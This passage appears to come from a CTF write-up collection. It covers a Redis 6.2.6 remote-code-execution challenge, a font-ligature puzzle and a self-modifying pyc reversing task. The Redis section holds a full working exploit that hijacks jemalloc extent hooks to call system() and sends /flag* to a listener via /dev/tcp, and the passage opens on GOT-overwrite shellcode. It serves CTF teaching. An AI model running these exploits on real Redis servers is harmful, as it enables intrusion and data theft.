'setrange', 'L', str(shellcode_addr - L_data),
shellcode
]) == 0x18000001
log.success(f'Shellcode @ {hex(shellcode_addr)}')
# hook vsnprintf to our shellcode to trigger our exploit at every unknown command
writer(binary.got['vsnprintf'], p32(shellcode_addr))
# just in case we crash, we want it to exit it instantly
writer(binary.got['backtrace'], p32(libc.sym['_exit']))
# we won't be doing any AAR/W, fix the memory structure so we don't crash at saves
# ...but we still freeze at bgsaves :crying_cat:
assert query(f'bitfield L set i64 4294967295 {0x010010 >> 1}')[0] == 0
assert query(f'bitfield L set u32 4294967288 {endian_rev(K_addr + 0xf)}')[0] == 0
# now test the exploit!
p.close()
p = FakeRemote(HOST, PORT)
p.send(b'lol\r\n')
print(p.recvuntil(b'}'))
```
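
The `query` helper in the solver speaks the Redis wire protocol (RESP) by hand. As a rough, socket-free sketch of the same framing, the functions below encode a command as an array of bulk strings and decode a reply from a byte buffer; `resp_encode` and `resp_decode` are illustrative names, not part of the solver.

```python
def resp_encode(q) -> bytes:
    # Lists become RESP arrays, everything else a bulk string.
    if isinstance(q, str):
        q = q.encode('ascii')
    if isinstance(q, (list, tuple)):
        return b'*%d\r\n' % len(q) + b''.join(resp_encode(e) for e in q)
    assert isinstance(q, (bytes, bytearray))
    return b'$%d\r\n' % len(q) + bytes(q) + b'\r\n'

def resp_decode(buf: bytes, pos: int = 0):
    # Returns (value, position just after the decoded value).
    end = buf.index(b'\r\n', pos)
    kind, line = buf[pos:pos + 1], buf[pos + 1:end]
    pos = end + 2
    if kind == b'+':
        return line, pos
    if kind == b'-':
        raise RuntimeError(f'Redis returned Error: {line}')
    if kind == b':':
        return int(line), pos
    if kind == b'$':
        n = int(line)
        if n < 0:               # null bulk string
            return None, pos
        return buf[pos:pos + n], pos + n + 2
    assert kind == b'*'
    items = []
    for _ in range(int(line)):
        item, pos = resp_decode(buf, pos)
        items.append(item)
    return items, pos

encoded = resp_encode(['setrange', 'L', '0', b'abc'])
decoded, _ = resp_decode(b'*2\r\n:1\r\n$3\r\nfoo\r\n')
print(encoded)
print(decoded)
```

Sending binary arguments as bulk strings is what lets the exploit pass raw pointers and shellcode through `setrange` without any quoting issues.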
</details>
## J. Trino: Mirai
Category: Pwnable\
Author: [Xion]\
Solvers: 0
<details>
<summary>Description</summary>
`Stage 3 - 2`
No more years-old dead PoCs, take a step into `Mirai`.
> Note: All `Trino` chal server & public files are equivalent (excluding Specfile descriptions).
</details>
<details>
<summary>Solution</summary>
**TL;DR**: RCE on Redis latest (6.2.6) default config via 0-day (or... N-day?)
After popping shell on `Trino: Pieces`, we can interact directly with Redis instances. For `Mirai` players must gain RCE on Redis 6.2.6 (latest stable) with default configs.
There are currently no publicly known RCE exploits against Redis version 6 and above. Previously known techniques such as Master-Slave replication + Module loading no longer work since the executable bit check was introduced.
So this challenge calls for a 0-day. Let's get our hands dirty and dive into the Redis source code!
A quick inspection of the fishiest command, `DEBUG`, shows that it implements many undocumented subcommands such as `mallctl`, which allows direct access to the jemalloc mallctl namespace. Checking out the [jemalloc mallctl documentation](https://nxmnpg.lemoda.net/3/mallctl#11), we see something similar to the infamous glibc malloc hook: `arena.<i>.extent_hooks`. Set this to any invalid address, attach a debugger, and run any command that triggers memory allocation/free; we get a crash!
We have a stunningly simple rip-control. By noting which functions are called at certain memory operations, we can call an arbitrary function with attacker-controlled data in rdi. Write our payload, use `debug object` to get the payload address, use `debug mallctl` to set the hook, then do any memory operation of your choice and pop the flag!
> Note 1: Anyone with access to a Redis instance can already do anything, just not RCE (until now!). The threat model was not clear enough to determine whether or not this is a "vulnerability". Nevertheless, the author responsibly disclosed this directly to the Redis core developer team on October 5th, 2021. This bug is fixed from Redis 7 RC1, and one can check the [release notes](https://raw.githubusercontent.com/redis/redis/7.0/00-RELEASENOTES) to find out the vuln too.
> Note 2: After Pull [#9202](https://github.com/redis/redis/pull/9202) `set-disable-deny-scripts` was available, which allows RCE even in a non-interactive (no-output) model by setting the flag and sending a single exploitation script in Lua! (until Pull [#9920](https://github.com/redis/redis/pull/9920) disabled `DEBUG` by default)
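
The constants in the solver below (`0x13`, `0x30`, `0x1c`, 9-character pieces) can be read as simple layout arithmetic. The sketch is one plausible reading, assuming a 64-bit build where an embedded string consists of a 16-byte `robj` header, a 3-byte `sdshdr8`, the data and a NUL terminator; `split_command`, `gadget_view` and the sample address are illustrative only.

```python
ROBJ_SIZE = 16        # assumed sizeof(robj) on a 64-bit build
SDSHDR8_SIZE = 3      # assumed sdshdr8 header: len, alloc, flags
DATA_OFS = ROBJ_SIZE + SDSHDR8_SIZE              # 0x13: object address -> string data
MAX_CMD = 0x1c                                   # per-command budget used by the solver
SLOT = ROBJ_SIZE + SDSHDR8_SIZE + MAX_CMD + 1    # 0x30 with the NUL terminator

def split_command(bash_cmd: str, path: str = '/data/a', piece: int = 9) -> list:
    # Build a script piece by piece so that every shell command fits the budget.
    cmds = [f"echo '#!/bin/bash'>{path}"]
    cmds += [
        f"echo -n '{bash_cmd[i:i + piece]}'>>{path}"
        for i in range(0, len(bash_cmd), piece)
    ]
    cmds += ["chmod 777 /da*/a", "/da*/a"]
    assert all(len(c) <= MAX_CMD for c in cmds)
    return cmds

def gadget_view(cmd_addr: int):
    # `mov rdi, [rdi] ; jmp [rdi + 0x30]`: rdi ends up at the command string,
    # and the jump target is read 0x30 bytes after it.
    rdi = cmd_addr + DATA_OFS
    return rdi, rdi + 0x30

bash_cmd = 'cat /flag* > /dev/tcp/pieces/9999'
cmds = split_command(bash_cmd)

cmd_addr = 0x7f0000001000          # hypothetical address of a cmd object
sys_addr = cmd_addr + SLOT         # adjacent object holding the system() pointer
rdi, jump_slot = gadget_view(cmd_addr)
print(hex(DATA_OFS), hex(SLOT), len(cmds), jump_slot == sys_addr + DATA_OFS)
```

Under these assumptions, a 28-byte command fills a 48-byte allocation exactly, which would explain why the solver retries until the `sys` object sits at `cmd_addr + 0x30`: only then does the gadget's `[rdi + 0x30]` read the stored `system` pointer.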
</details>
<details>
<summary>Solver Code</summary>
This exploit is meant to run on `Pieces` after popping shell.
`solver_mirai.py`:
```python=1
#!/usr/bin/env python3
import socket
import ctypes, struct
import os, time
class FakeRemote:
    def __init__(self, host, port):
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.connect((host, port))
    def send(self, data):
        if isinstance(data, str):
            data = data.encode('ascii')
        self.s.send(data)
    def recv(self, length):
        data = b''
        while len(data) < length:
            recv = self.s.recv(length - len(data))
            if not recv:
                raise EOFError
            data += recv
        return data
    def recvall(self):
        data = b''
        while True:
            recv = self.s.recv(0x1000)
            if not recv:
                break
            data += recv
        return data
    def recvuntil(self, until, drop=False):
        data = b''
        while not data.endswith(until):
            recv = self.s.recv(1)
            if not recv:
                raise EOFError
            data += recv
        return data[:-len(until)] if drop else data
    def info(self, s):
        print(f'[*] {s}')
    def success(self, s):
        print(f'[+] {s}')
    def close(self):
        self.s.close()
def query(qs):
    def _query(q):
        if isinstance(q, str):
            q = q.encode('ascii')
        if isinstance(q, (list, tuple)):
            p.send(f'*{len(q)}\r\n'.encode('ascii'))
            for qe in q:
                _query(qe)
        else:
            assert isinstance(q, (bytes, bytearray))
            p.send(f'${len(q)}\r\n'.encode('ascii') + q + b'\r\n')
    def _resp():
        first = p.recv(1)
        if first == b'+':
            return p.recvuntil(b'\r\n', drop=True)
        elif first == b'-':
            err = p.recvuntil(b'\r\n', drop=True)
            raise RuntimeError(f'Redis returned Error: {err}')
        elif first == b':':
            return int(p.recvuntil(b'\r\n', drop=True))
        elif first == b'$':
            length = int(p.recvuntil(b'\r\n', drop=True))
            data = p.recv(length)
            assert p.recv(2) == b'\r\n'
            return data
        else:
            assert first == b'*'
            length = int(p.recvuntil(b'\r\n', drop=True))
            return [_resp() for _ in range(length)]
    if isinstance(qs, str):
        qs = qs.encode('ascii')
    if isinstance(qs, (bytes, bytearray)):
        p.send(qs + b'\r\n')
    else:
        _query(qs)
    return _resp()
def query_addr(obj):
    return int(query(f'''debug object {obj}''').split()[1][3:], 16)
def p64(v, endian='little'):
    return struct.pack('<Q' if endian=='little' else '>Q', v)
def u64(v, endian='little'):
    return struct.unpack('<Q' if endian=='little' else '>Q', v)[0]
LHOST, LPORT = 'pieces', 9999
HOST, PORT = 'mirai', 65403
if os.fork() == 0:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('0.0.0.0', LPORT))
    s.listen(1)
    conn, addr = s.accept()
    while True:
        data = conn.recv(0x1000)
        if not data:
            break
        print(data)
    exit()
time.sleep(0.5)
bash_cmd = f'cat /flag* > /dev/tcp/{LHOST}/{LPORT}'
cmds = [
# '0123456789abcdef0123456789ab'
"echo '#!/bin/bash'>/data/a",
] + [
f"echo -n '{bash_cmd[st:st+9]}'>>/data/a" for st in range(0, len(bash_cmd), 9)
] + [
"chmod 777 /da*/a",
"/da*/a"
]
assert all(len(cmd) <= 0x1c for cmd in cmds)
cmds = [cmd.ljust(0x1c, '\0') for cmd in cmds]
p = FakeRemote(HOST, PORT)
assert query('''config set save ""''') == b'OK'
assert query('''debug mallctl background_thread 0''') in (0, 1) # 1: first run, 0: following runs
for i in range(len(cmds)):
    assert query(f'''setbit K{i} 400000 0''') == 0
# can be replaced with "set I0 0" => "debug object I0"
libc_base = query('''debug mallctl thread.allocatedp''') + 0x38c0
assert libc_base & 0xfff == 0
libssl_base = libc_base + 0x4cd000
# for each cmds, try 0x100 times to get adjacent embstr
cmd_addrs = []
for i in range(len(cmds)):
    for j in range(0x100):
        assert query(['set', f'cmd{i}_{j}', cmds[i]]) == b'OK'
        assert query(['set', f'sys{i}_{j}',
            p64(libc_base + 0x449c0).ljust(0x1c)
        ]) # system@libc offset
        cmd_addr, sys_addr = query_addr(f'cmd{i}_{j}'), query_addr(f'sys{i}_{j}')
        if sys_addr == cmd_addr + 0x30:
            break
    else:
        assert False
    cmd_addrs.append(cmd_addr)
# 0x0000000000035ae0 : mov rdi, qword ptr [rdi] ; jmp qword ptr [rdi + 0x30]
for i in range(len(cmds)):
    cmd, cmd_addr = cmds[i], cmd_addrs[i]
    assert query(['set', 'extent_hook',
        p64(cmd_addr+0x13)+p64(libssl_base+0x35ae0)
    ]) == b'OK'
    extent_hook_addr = query_addr('extent_hook')
    original_extent_hook = query(f'''debug mallctl arena.0.extent_hooks {extent_hook_addr+0x13}''')
    assert query(f'''del K{i}''') == 1
    assert query('''memory purge''') == b'OK' # command executed!
    # cleanup :)
    assert query(f'''debug mallctl arena.0.extent_hooks {original_extent_hook}''') == extent_hook_addr+0x13
assert query('flushall sync') == b'OK'
assert query('memory purge') == b'OK'
p.close()
```
</details>
## L. input box
Category: Misc\
Author: [okas832]\
Solvers: 13
<details>
<summary>Description</summary>
Only One Web Server
No Server-Side Code
No Information
Only One Input Box
</details>
<details>
<summary>Solution</summary>
By reading the short assets of the web page, we can find that the text in the input box is copied to `div[id=tmp]` by JavaScript code. However, the text you type does not show up, even though the CSS shows that the text is neither white nor transparent. So we can tell that the font, `sans.otf`, is not normal. (You can also find this out by dropping the font-related HTTP request/response.)
Note : If you think you saw everything and got no information, watch [this](https://www.youtube.com/watch?v=BLikP6BDH5w).
We can inspect this opentype font with [Opentype.js](https://opentype.js.org).
Most of the glyphs in the font are empty, except one: glyph number 1076, named `G00979`, has a `GOOD`-shaped outline. So our goal is to find an input value that makes the font show `G00979`.
`G00979` cannot be produced by a single Unicode character, but it can be produced from other glyphs according to `GSUB`, the [Glyph Substitution Table](http://adobe-type-tools.github.io/afdko/OpenTypeFeatureFileSpecification.html#). In the lookup table, there are many rules of the form `substitute glyphA glyphB by glyphC`. With these, we can find the candidates for `glyphA glyphB` that make `glyphC`.
To keep this challenge from being annoying, there is only one possible way to make each target glyph. So simply walking backwards from the target, at each step looking up the previous glyph and the one input that produce the current glyph, recovers the proper input.
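
The backward walk can be illustrated with a toy rule table. The glyph names and rules below are made up for illustration and are not taken from `sans.otf`; each rule maps a (previous glyph, typed character) pair to the glyph that replaces it, similar to a ligature substitution.

```python
# Hypothetical ligature rules: (previous_glyph, typed_char) -> resulting_glyph.
rules = {
    ('start', 'G'): 'g1',
    ('g1', 'o'): 'g2',
    ('g2', 'N'): 'g3',
    ('g3', '!'): 'GOOD',
    ('g1', 'x'): 'dead1',   # a branch that never reaches the target
}

# Invert the table: resulting glyph -> list of (typed_char, previous_glyph).
produced_by = {}
for (prev, typed), result in rules.items():
    produced_by.setdefault(result, []).append((typed, prev))

def recover_input(target: str, start: str = 'start') -> str:
    # Walk from the target glyph back to the start, prepending each typed char.
    out = ''
    cur = target
    while cur != start:
        typed, cur = produced_by[cur][0]   # unique predecessor by construction
        out = typed + out
    return out

recovered = recover_input('GOOD')
print(recovered)
```

Because every glyph on the path has exactly one producer, no search or backtracking is needed; the dead-end branch is simply never visited.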
Challenge idea reference : [Fontemon](https://www.coderelay.io/fontemon.html)
</details>
<details>
<summary>Solver Code</summary>
Instead of opentype.js, I use [ttx](https://fonttools.readthedocs.io/en/latest/ttx.html) to parse the OTF. Handling the initial glyph is a little complicated, so I just skip it and rely on the flag format.
```python=
import xml.etree.ElementTree as elemTree
tree = elemTree.parse('./sans.ttx')
root = tree.getroot()
dic = {}
for sub in root[9][3][2:]:
    subst = sub[2]
    if len(sub[2]) == 1:
        ls = sub[2][0]
    else:
        ls = sub[2][1][0]
    # found LigatureSet
    gname = ls.attrib["glyph"]
    for lig in ls:
        ipt = lig.attrib["components"]
        dg = lig.attrib["glyph"]
        if not dic.get(dg, None):
            dic[dg] = []
        dic[dg].append((ipt, gname))
i2c = {}
for glyphid in root[0]:
    gid = int(glyphid.attrib["id"])
    if gid >= 1 and gid <= 96:
        i2c[glyphid.attrib["name"]] = chr(gid + 0x1f)
it = "G00979"
flag = ""
while not flag.startswith("N{"):
    ipt, it = dic[it][0]
    flag = i2c[ipt] + flag
print("Go" + flag)
```
</details>
## M. pyc
Category: Reversing\
Author: [okas832]\
Solvers: 13
<details>
<summary>Description</summary>
Just analyzing result of `dis.dis` is not fun at all.
</details>
<details>
<summary>Solution</summary>
Let's disassemble the module first
```
vagrant ~ $ python3.10
Python 3.10.2 (main, Jan 15 2022, 18:03:19) [GCC 7.5.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> f = open("prob.pyc", "rb")
>>> import dis
>>> import marshal
>>> f.seek(16)
16
>>> dis.dis(marshal.load(f))
1 0 LOAD_CONST 0 (0)
2 LOAD_CONST 1 (None)
4 IMPORT_NAME 0 (struct)
6 STORE_NAME 0 (struct)
3 8 BUILD_LIST 0
10 LOAD_CONST 2 ((161, 55, 37, 106, 136, 128, 88, 143, 139, 247, 182, 192, 140, 132, 222, 141, 79, 38, 69, 75, 184, 232, 66, 72, 152, 14, 202, 49, 143, 58, 194, 161, 241, 230, 237, 118, 254, 112, 85, 32, 220, 192, 179, 201, 216, 132, 141, 42, 53))
12 LIST_EXTEND 1
14 STORE_NAME 1 (k)
4 16 BUILD_LIST 0
18 LOAD_CONST 3 ((239, 88, 97, 17, 198, 239, 121, 208, 223, 159, 135, 245, 211, 181, 173, 210, 1, 22, 49, 20, 254, 132, 118, 15, 199, 87, 250, 100, 208, 84, 241, 146, 149, 185, 153, 70, 161, 2, 48, 86, 131, 173, 220, 187, 189, 165, 205, 9, 72))
20 LIST_EXTEND 1
22 STORE_NAME 2 (key)
5 24 BUILD_LIST 0
26 LOAD_CONST 4 ((0, 0, 16, 0, 255, 1, 254, 0, 16, 0, 124, 1, 231, 3, 35, 2, 222, 53, 0, 0, 0, 0, 0, 0, 0, 2, 24, 2, 221, 3, 196, 6, 115, 2, 225, 1, 184, 2, 25, 1, 197, 6, 0, 1, 24, 5, 25, 4, 24, 7, 248, 7, 125, 7, 1, 4, 24, 9, 25, 3, 99, 0, 16, 7, 98, 5, 91, 9, 255, 3, 231, 5, 255, 0, 101, 8, 16, 3, 149, 0, 67, 8, 54, 7, 16, 0, 60, 0, 231, 6, 53, 8, 35, 6, 32, 2, 57, 8, 253, 0, 106, 1, 1, 9, 0, 9, 196, 11, 107, 1, 24, 9, 196, 2, 184, 1, 22, 0, 12, 48, 5, 2, 0, 8, 208, 1))
28 LIST_EXTEND 1
30 STORE_NAME 3 (m)
7 32 LOAD_CONST 5 (<code object chk at 0x7f2adab20a80, file "main.py", line 7>)
34 LOAD_CONST 6 ('chk')
36 MAKE_FUNCTION 0
38 STORE_NAME 4 (chk)
22 40 LOAD_NAME 5 (input)
42 CALL_FUNCTION 0
44 LOAD_METHOD 6 (encode)
46 CALL_METHOD 0
48 STORE_NAME 7 (ipt)
24 50 LOAD_CONST 0 (0)
52 LOAD_CONST 1 (None)
54 IMPORT_NAME 8 (ctypes)
56 STORE_NAME 8 (ctypes)
25 58 LOAD_CONST 7 (<code object throw at 0x7f2adab21630, file "main.py", line 25>)
60 LOAD_CONST 8 ('throw')
62 MAKE_FUNCTION 0
64 STORE_NAME 9 (throw)
44 66 SETUP_FINALLY 28 (to 124)
45 68 LOAD_NAME 7 (ipt)
70 LOAD_METHOD 10 (find)
72 LOAD_CONST 9 ('GoN{')
74 CALL_METHOD 1
76 LOAD_CONST 10 (-1)
78 COMPARE_OP 3 (!=)
80 POP_JUMP_IF_FALSE 56 (to 112)
82 LOAD_NAME 4 (chk)
84 LOAD_NAME 7 (ipt)
86 CALL_FUNCTION 1
88 LOAD_NAME 11 (bytes)
90 LOAD_NAME 1 (k)
92 CALL_FUNCTION 1
94 COMPARE_OP 2 (==)
96 POP_JUMP_IF_FALSE 59 (to 118)
46 98 LOAD_NAME 12 (print)
100 LOAD_CONST 11 ('Good!')
102 CALL_FUNCTION 1
104 POP_TOP
106 POP_BLOCK
108 LOAD_CONST 1 (None)
110 RETURN_VALUE
45 >> 112 POP_BLOCK
114 LOAD_CONST 1 (None)
116 RETURN_VALUE
>> 118 POP_BLOCK
120 LOAD_CONST 1 (None)
122 RETURN_VALUE
47 >> 124 POP_TOP
126 POP_TOP
128 POP_TOP
48 130 LOAD_NAME 9 (throw)
132 CALL_FUNCTION 0
134 POP_TOP
136 POP_EXCEPT
138 LOAD_CONST 1 (None)
140 RETURN_VALUE
Disassembly of <code object chk at 0x7f2adab20a80, file "main.py", line 7>:
8 0 LOAD_GLOBAL 0 (range)
2 LOAD_CONST 1 (3)
4 CALL_FUNCTION 1
6 STORE_FAST 1 (i)
9 8 LOAD_GLOBAL 1 (len)
10 LOAD_CONST 1 (3)
12 LOAD_CONST 2 (4)
14 BUILD_LIST 2
16 CALL_FUNCTION 1
18 STORE_FAST 1 (i)
10 20 LOAD_GLOBAL 2 (int)
22 LOAD_METHOD 3 (from_bytes)
24 LOAD_FAST 2 (r0)
26 LOAD_CONST 3 ('little')
28 CALL_METHOD 2
30 LOAD_METHOD 4 (to_bytes)
32 LOAD_CONST 2 (4)
34 LOAD_CONST 3 ('little')
36 CALL_METHOD 2
38 STORE_FAST 2 (r0)
11 40 LOAD_CONST 4 (16)
42 STORE_FAST 3 (r1)
12 44 LOAD_CONST 5 (32)
46 STORE_FAST 4 (r2)
13 48 LOAD_CONST 6 (4294967295)
50 STORE_FAST 5 (r3)
14 52 LOAD_CONST 7 (3735928559)
54 STORE_FAST 6 (r4)
15 56 LOAD_CONST 8 ('Good!')
58 STORE_FAST 7 (r5)
16 60 LOAD_GLOBAL 0 (range)
62 LOAD_GLOBAL 2 (int)
64 LOAD_GLOBAL 5 (str)
66 LOAD_CONST 9 ('3')
68 CALL_FUNCTION 1
70 CALL_FUNCTION 1
72 CALL_FUNCTION 1
74 STORE_FAST 8 (res)
17 76 LOAD_GLOBAL 6 (list)
78 CALL_FUNCTION 0
80 STORE_FAST 8 (res)
18 82 LOAD_GLOBAL 7 (zip)
84 LOAD_GLOBAL 6 (list)
86 LOAD_FAST 0 (ipt)
88 CALL_FUNCTION 1
90 LOAD_GLOBAL 8 (key)
92 CALL_FUNCTION 2
94 GET_ITER
>> 96 FOR_ITER 11 (to 120)
98 UNPACK_SEQUENCE 2
100 STORE_FAST 1 (i)
102 STORE_FAST 9 (j)
19 104 LOAD_FAST 8 (res)
106 LOAD_METHOD 9 (append)
108 LOAD_FAST 1 (i)
110 LOAD_FAST 9 (j)
112 BINARY_XOR
114 CALL_METHOD 1
116 POP_TOP
118 JUMP_ABSOLUTE 48 (to 96)
20 >> 120 LOAD_GLOBAL 10 (bytes)
122 LOAD_FAST 8 (res)
124 CALL_FUNCTION 1
126 RETURN_VALUE
Disassembly of <code object throw at 0x7f2adab21630, file "main.py", line 25>:
26 0 JUMP_ABSOLUTE 3 (to 6)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python3.10/dis.py", line 79, in dis
_disassemble_recursive(x, file=file, depth=depth)
File "/usr/lib/python3.10/dis.py", line 384, in _disassemble_recursive
_disassemble_recursive(x, file=file, depth=depth)
File "/usr/lib/python3.10/dis.py", line 376, in _disassemble_recursive
disassemble(co, file=file)
File "/usr/lib/python3.10/dis.py", line 372, in disassemble
_disassemble_bytes(co.co_code, lasti, co.co_varnames, co.co_names,
File "/usr/lib/python3.10/dis.py", line 404, in _disassemble_bytes
for instr in _get_instructions_bytes(code, varnames, names,
File "/usr/lib/python3.10/dis.py", line 340, in _get_instructions_bytes
argval, argrepr = _get_name_info(arg, names)
File "/usr/lib/python3.10/dis.py", line 304, in _get_name_info
argval = name_list[name_index]
IndexError: tuple index out of range
```
With a lazy analysis and a little guessing: the `chk` function contains a bunch of useless code, then XORs `ipt` with `key` character by character, and the result is later compared with `k`.
```
>>> ans = ''
>>> for i, j in zip(prob.key, prob.k):
...     ans += chr(i ^ j)
...
>>> ans
'NoD{No!_Th15_1s_N0t_Fl4G_Y0U_n33d_t0_rev_more!@#}'
```
[Meme](https://www.youtube.com/watch?v=GPXkjtpGCFI)
Looking a little closer at the bytecode, it becomes clear that the main code is seriously wrong.
```python
...
ipt = input().encode()
...
try:
    if ipt.find("GoN{") != -1 and chk(ipt) == bytes(k):
        print("Good!")
except:
    throw()
```
`ipt` is a `bytes` object, but `find` is called with a `str` argument. That raises an exception (a `TypeError`), so the `except` branch runs and calls `throw`.
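The failure is easy to reproduce in isolation. The sketch below uses a made-up sample value for `ipt` (not the real challenge input) and shows that `bytes.find` rejects a `str` needle, which is the path that ends up in `throw`.

```python
# Sample input; the real program reads this from input().encode().
ipt = "GoN{sample}".encode()

try:
    ipt.find("GoN{")          # str needle on a bytes haystack
    raised = False
except TypeError:
    raised = True             # this is the branch that calls throw()

# With a bytes needle the same call works as a normal check would.
found_at = ipt.find(b"GoN{")
print(raised, found_at)
```

So the `print("Good!")` in the main body can never be reached, no matter what the input is.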
So we need to look at the `throw` function, but `dis` raises an error while disassembling it (see the traceback above).
Let's look at the bytecode of `throw`:
```
0 JUMP_ABSOLUTE (to 6)
2 LOAD_NAME (255)
4 <255>
6 NOP
...
```
The junk after the jump contains `LOAD_NAME 255`. `dis` tries to resolve the name at index 255 in the function's name table, but `prob.throw.__code__.co_names` only has 17 entries, which is why `dis` raises `IndexError`.
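If you want to stay with the standard library, a tolerant walk over the raw bytes avoids the crash. This is only a minimal sketch under assumptions: it treats the code as plain 2-byte (opcode, arg) pairs in the Python 3.10 style, ignores `EXTENDED_ARG` and the argument encodings of newer versions, and the `junk` bytes and `names` tuple are hand-built stand-ins, not data from the challenge.

```python
import dis

def raw_disasm(code_bytes, names):
    """Walk 2-byte (opcode, arg) pairs without trusting name indices."""
    rows = []
    for offset in range(0, len(code_bytes) - 1, 2):
        op, arg = code_bytes[offset], code_bytes[offset + 1]
        if op in dis.hasname:
            # Resolve the name only when the index is actually valid.
            shown = names[arg] if arg < len(names) else f"<bad name index {arg}>"
        else:
            shown = str(arg)
        rows.append((offset, dis.opname[op], shown))
    return rows

# Hand-built stand-in for the junk in throw: LOAD_NAME 255, then NOP.
junk = bytes([dis.opmap["LOAD_NAME"], 255, dis.opmap["NOP"], 0])
names = ("ctypes", "c_char")  # hypothetical, far fewer than 256 entries
rows = raw_disasm(junk, names)
for row in rows:
    print(row)
```

Since the junk sits behind an unconditional jump, it never executes; it only exists to trip up disassemblers that resolve every operand.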
There is a better disassembler, [xdis](https://github.com/rocky/python-xdis). It produces much more readable output and does not error out.
Here is the xdis result (only `throw`):
```
# Method Name: throw
# Filename: main.py
# Argument count: 0
# Position-only argument count: 0
# Keyword-only arguments: 0
# Number of locals: 5
# Stack size: 5
# Flags: 0x00000043 (NOFREE | NEWLOCALS | OPTIMIZED)
# First Line: 25
# Constants:
# 0: None
# 1: 1
# 2: 32
# 3: 8
# Names:
# 0: ctypes
# 1: c_char
# 2: len
# 3: m
# 4: from_address
# 5: id
# 6: chk
# 7: __code__
# 8: co_code
# 9: zip
# 10: raw
# 11: append
# 12: bytes
# 13: ipt
# 14: k
# 15: print
# 16: co_consts
# Varnames:
# a, ptr1, res, i, j
# Local variables:
# 0: a
# 1: ptr1
# 2: res
# 3: i
# 4: j
25: 0 JUMP_ABSOLUTE (to 6)
2 LOAD_NAME (255)
26: 4 <255> 9
>> 6 NOP
27: 8 LOAD_GLOBAL (ctypes)
10 LOAD_ATTR (c_char)
12 LOAD_GLOBAL (len)
14 LOAD_GLOBAL (m)
16 CALL_FUNCTION 1
18 BINARY_MULTIPLY
20 LOAD_METHOD (from_address)
22 LOAD_GLOBAL (id)
24 LOAD_GLOBAL (chk)
26 LOAD_ATTR (__code__)
28 LOAD_ATTR (co_code)
30 CALL_FUNCTION 1
32 LOAD_CONST (32)
34 BINARY_ADD
36 CALL_METHOD 1
38 STORE_FAST (ptr1)
29: 40 BUILD_LIST 0
42 STORE_FAST (res)
31: 44 LOAD_GLOBAL (zip)
46 LOAD_FAST (ptr1)
48 LOAD_ATTR (raw)
50 LOAD_GLOBAL (m)
52 CALL_FUNCTION 2
54 GET_ITER
>> 56 FOR_ITER (to 138)
58 UNPACK_SEQUENCE 2
60 STORE_FAST (i)
62 STORE_FAST (j)
32: 64 LOAD_FAST (res)
66 LOAD_METHOD (append)
68 LOAD_FAST (i)
70 LOAD_FAST (j)
72 BINARY_XOR
74 CALL_METHOD 1
76 POP_TOP
78 JUMP_ABSOLUTE (to 56)
33: >> 80 LOAD_GLOBAL (bytes)
82 LOAD_FAST (res)
84 CALL_FUNCTION 1
86 LOAD_FAST (ptr1)
88 STORE_ATTR (raw)
34: 90 LOAD_GLOBAL (chk)
92 LOAD_GLOBAL (ipt)
94 CALL_FUNCTION 1
96 LOAD_GLOBAL (bytes)
98 LOAD_GLOBAL (k)
100 CALL_FUNCTION 1
102 COMPARE_OP (==)
104 POP_JUMP_IF_FALSE (to 122)
36: 106 LOAD_GLOBAL (print)
108 LOAD_GLOBAL (chk)
110 LOAD_ATTR (__code__)
112 LOAD_ATTR (co_consts)
114 LOAD_CONST (8)
116 BINARY_SUBSCR
118 CALL_FUNCTION 1
120 POP_TOP
37: >> 122 BUILD_LIST 0
124 STORE_FAST (res)
39: 126 LOAD_GLOBAL (zip)
128 LOAD_FAST (ptr1)
130 LOAD_ATTR (raw)
132 LOAD_GLOBAL (m)
134 CALL_FUNCTION 2
136 GET_ITER
>> 138 FOR_ITER (to 302)
140 UNPACK_SEQUENCE 2
142 STORE_FAST (i)
144 STORE_FAST (j)
40: 146 LOAD_FAST (res)
148 LOAD_METHOD (append)
150 LOAD_FAST (i)
152 LOAD_FAST (j)
154 BINARY_XOR
156 CALL_METHOD 1
158 POP_TOP
160 JUMP_ABSOLUTE (to 138)
41: >> 162 LOAD_GLOBAL (bytes)
164 LOAD_FAST (res)
166 CALL_FUNCTION 1
168 LOAD_FAST (ptr1)
170 STORE_ATTR (raw)
172 LOAD_CONST (None)
174 RETURN_VALUE
```
Decompiling this result gives:
```python=
def throw():
    ptr1 = (ctypes.c_char * len(m)).from_address(id(chk.__code__.co_code) + 32)
    res = []
    for i, j in zip(ptr1.raw, m):
        res.append(i^j)
    ptr1.raw = bytes(res)
    if chk(ipt) == bytes(k):
        print(chk.__code__.co_consts[8])
    res = []
    for i, j in zip(ptr1.raw, m):
        res.append(i^j)
    ptr1.raw = bytes(res)
```
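This XORs the bytes at address `id(chk.__code__.co_code) + 32` with `m`, which modifies the bytecode of `chk` in place (on 64-bit CPython, the `+ 32` skips the `bytes` object header and lands on the raw data). It then calls `chk` with your input, compares the result with `k`, and finally XORs again to restore the original code. (The restore step is there to block the easy way of simply running `dis.dis` after `import prob`.)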
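The two ingredients can be tried safely outside the challenge. The sketch below is an illustration under assumptions: it relies on CPython's object layout (the header size is derived from `bytes.__basicsize__` rather than hard-coded), `mask` is a made-up stand-in for `m`, and the XOR patch is applied to a writable `bytearray` copy instead of a live code object.

```python
import ctypes

# CPython detail: offset of the payload inside a bytes object.
HEADER = bytes.__basicsize__ - 1          # 32 on 64-bit CPython

sample = b"\x64\x00\x53\x00"              # any bytes object works here
peek = ctypes.string_at(id(sample) + HEADER, len(sample))

# XOR patching through a ctypes view, on a harmless bytearray copy.
mask = bytes([0x11, 0x22, 0x33, 0x44])    # hypothetical stand-in for `m`
buf = bytearray(sample)
view = (ctypes.c_char * len(mask)).from_buffer(buf)

def xor_in_place(view, mask):
    view.raw = bytes(i ^ j for i, j in zip(view.raw, mask))

xor_in_place(view, mask)
patched = bytes(buf)
xor_in_place(view, mask)                  # second pass undoes the first
restored = bytes(buf)
print(peek == sample, patched != sample, restored == sample)
```

Because XOR is its own inverse, the same loop both installs and removes the patch, which is why `throw` contains it twice.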
We can recover the modified code by applying the same XOR ourselves.
```
>>> import ctypes
>>> ptr1 = (ctypes.c_char * len(prob.m)).from_address(id(prob.chk.__code__.co_code) + 32)
>>> res = []
>>> for i, j in zip(ptr1.raw, prob.m):
...     res.append(i^j)
...
>>> ptr1.raw = bytes(res)
>>> import dis
>>> dis.dis(prob.chk)
```
